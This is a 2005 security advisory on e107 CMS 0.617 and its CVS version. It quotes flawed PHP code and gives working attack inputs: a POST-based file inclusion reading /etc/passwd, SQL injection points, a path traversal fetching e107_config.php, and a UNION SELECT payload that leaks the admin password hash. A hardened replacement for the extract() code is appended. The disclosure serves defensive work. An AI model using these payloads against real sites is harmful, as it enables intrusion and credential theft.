e107617.txt

2005-07-13T00:00:00
ID PACKETSTORM:38638
Type packetstorm
Reporter Heintz
Modified 2005-07-13T00:00:00

Description

Software: http://www.e107.org  
Author: Heintz  
Advisory origin: http://www.waraxe.us  
Software bugtracker: http://e107.org/e107_plugins/bugtracker2/bugtracker2.php?0.bug.558  
  
e107 v 0.617  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
search.php line ~ 142  
if($_POST['searchquery']){  
echo "<div style='border:0;padding-right:2px;width:auto;height:400px;overflow:auto;'>";  
unset($text);  
extract($_POST);  
  
Here extract() registers every key of the _POST array as a variable and overwrites any existing variable of the same name; this is worse than register_globals.  
  
A few lines further on:  
if(file_exists($search_info[$key[$a]]['sfile'])){  
@require_once($search_info[$key[$a]]['sfile']);  
$ns -> tablerender(LAN_195." ".$search_info[$key[$a]]['qtype']." : ".LAN_196.": ".$results, $text);  
}  
  
So we need to POST the following variables:  
searchquery=aaa  
search_info[0][sfile]=/etc/passwd  
searchtype[0]=0  
searchtype[1]=0  
  
  
Let's look further.  
  
top.php line ~79  
The SQL queries before it have quotes around the variable and those cannot be broken out of, but  
in this case there is no need to send any quotes in the variable:  
  
$replies = $sql2 -> db_Select("forum_t", "*", "thread_parent=$thread_id");  
  
top.php?[INJECTION].active.all.[INJECTION]  
This is only of any use if the MySQL version supports subqueries.  
  
Let's look some more:  
when downloads are handled and sent by PHP (i.e. that option is turned on):  
  
request.php ~87  
  
send_file(e_FILE."public/".$download_url);  
  
When the file to be downloaded does not contain "http://" or "ftp://", the  
file is read and sent to the user.  
  
request.php?../../e107_config.php  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
The CVS version was downloaded and things are better there, but not enough,  
so this advisory continues with the CVS version of the software.  
CVS is subject to change, however.  
  
Let's start with the less dangerous features of the software:  
  
e107_files/resetcore.php ~199  
  
if (isset($_POST['reset_core_sub']) && $_POST['mode'] == 1) {  
  
$a_name = preg_replace('/\\W/i', '', $_POST['a_name']);  
$a_password = preg_replace('/\\W/i', '', $_POST['a_password']);  
  
if (!$result = mysql_query("SELECT * FROM ".$mySQLprefix."user WHERE user_name='{$a_name}' AND user_password='{$a_password}' AND user_perms=0")) {  
exit;  
}  
  
If the reset_core_sub and mode variables are set and the SQL query syntax is OK  
(note that I said query *syntax*: no data needs to be retrieved by the query),  
then we get the CMS core configuration, which is good information for what we are going into next.  
  
Let's move on.  
  
forum_viewforum.php ~196  
  
if($sql -> db_Select("forum_t", "*", "thread_forum_id='".$forum_id."' AND thread_parent='0' ORDER BY thread_s DESC, thread_lastpost DESC, thread_datestamp DESC LIMIT $from, $view")){  
  
forum_viewforum.php?5.[INJECTION]#  
  
Let's go on.  
  
request.php line ~120  
  
if ($type == "file")  
{  
$qry = "  
SELECT d.*, dc.download_category_class FROM #download as d  
LEFT JOIN #download_category AS dc ON dc.download_category_id = d.download_id  
WHERE d.download_id = $id;  
";  
  
request.php?1/**/UNION/**/SELECT/**/null,null,concat(user_password,0x687474703A2F2F00),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1  
  
This will try to redirect your browser to <adminhash>http://  
in the HTTP Location header.  
  
And on:  
  
e107_handlers/upload_handler.php ~38  
  
if ($pref['upload_storagetype'] == "2" && $avatar == FALSE) {  
extract($_FILES);  
for($c = 0; $c <= 1; $c++)  
  
With enough knowledge of HTTP it would be possible to  
"rewrite" _FILES so that a local file is loaded into the db (not very useful, I guess, but read on).  
  
  
extract() is able to rewrite the _SESSION array. This is disastrous, because it is the  
one array that is almost always trusted to contain valid data,  
so we can put an admin hash and id into it and we are admin, and this leads to  
execution of our own PHP code, which makes things really nasty.  
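
Both extract() findings above (search.php overwriting $search_info, and upload_handler.php reaching _SESSION) share one root cause: request data is allowed to name arbitrary variables. The following is an added example, not e107's own code, of how the search.php block could be written so that the request can only pick from an application-defined handler table; the plugin directory layout and handler paths are assumed sample values.

```php
<?php
// Added example, not e107's own code: the search.php pattern from this
// advisory rewritten so that request data cannot overwrite $search_info
// (the list of files passed to require_once) or $_SESSION.
// Assumption: handlers live under a fixed plugin directory; paths are
// constructed sample values.
declare(strict_types=1);
define('PLUGIN_ROOT', __DIR__ . '/e107_plugins');   // assumed layout

// Handler table defined by the application, never by the request.
$search_info = [
    0 => ['sfile' => PLUGIN_ROOT . '/forum/search.php',   'qtype' => 'Forum'],
    1 => ['sfile' => PLUGIN_ROOT . '/content/search.php', 'qtype' => 'Content'],
];

// VULNERABLE (as described above): every POST key becomes a variable, so
// search_info[0][sfile]=... silently replaces the trusted handler path.
//   extract($_POST);

// HARDENED: read only the named fields and validate each against the table.
function selected_search_types(array $post, array $search_info): array
{
    $query = isset($post['searchquery']) ? trim((string) $post['searchquery']) : '';
    if ($query === '') {
        return [];
    }
    $types = (isset($post['searchtype']) && is_array($post['searchtype'])) ? $post['searchtype'] : [];
    $selected = [];
    foreach ($types as $idx) {
        // Accept only integer keys present in the application-defined table
        // (filter_var returns false for arrays and non-numeric strings).
        if (filter_var($idx, FILTER_VALIDATE_INT) !== false && isset($search_info[(int) $idx])) {
            $selected[(int) $idx] = true;
        }
    }
    return array_keys($selected);
}

function run_search(array $post, array $search_info): void
{
    $root = realpath(PLUGIN_ROOT);
    foreach (selected_search_types($post, $search_info) as $key) {
        $sfile = realpath($search_info[$key]['sfile']);
        // Defence in depth: the resolved path must lie inside the plugin tree.
        if ($root === false || $sfile === false || strpos($sfile, $root . DIRECTORY_SEPARATOR) !== 0) {
            continue;
        }
        require_once $sfile;
    }
}
```

With this shape, a POST carrying search_info[0][sfile] or _SESSION[...] keys is simply never consulted, and the realpath check catches a bad entry even if the table itself is ever populated from configuration.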
  
Greets  
~~~~~~~  
slimjim100, fulvioo, Gotisch, KuerbY, legion and Torufoorum.  
Special greets go to Waraxe.  